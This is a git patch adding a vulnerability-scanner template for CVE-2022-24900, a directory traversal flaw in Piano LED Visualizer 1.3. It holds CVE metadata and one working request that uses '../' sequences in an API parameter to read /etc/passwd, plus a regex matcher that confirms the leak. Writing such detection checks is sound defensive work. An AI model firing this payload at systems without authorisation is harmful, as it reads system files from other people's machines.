From 8799a2ad5d7abf0da79a2b011ea09b9824443f7f Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 30 May 2022 18:03:55 +0900 Subject: [PATCH] Create CVE-2022-24900.yaml --- CVE-2022-24900.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 CVE-2022-24900.yaml diff --git a/CVE-2022-24900.yaml b/CVE-2022-24900.yaml new file mode 100644 index 0000000000..17425352d8 --- /dev/null +++ b/CVE-2022-24900.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-24900 + +info: + name: Piano LED Visualizer 1.3 - Directory traversal + author: 0x_Akoko + severity: high + description: Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. + reference: + - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 + - https://www.cvedetails.com/cve/CVE-2022-24900/ + - https://vuldb.com/?id.198714 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-24900 + cwe-id: CWE-22 + tags: lfi,cve2022,cve,piano,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200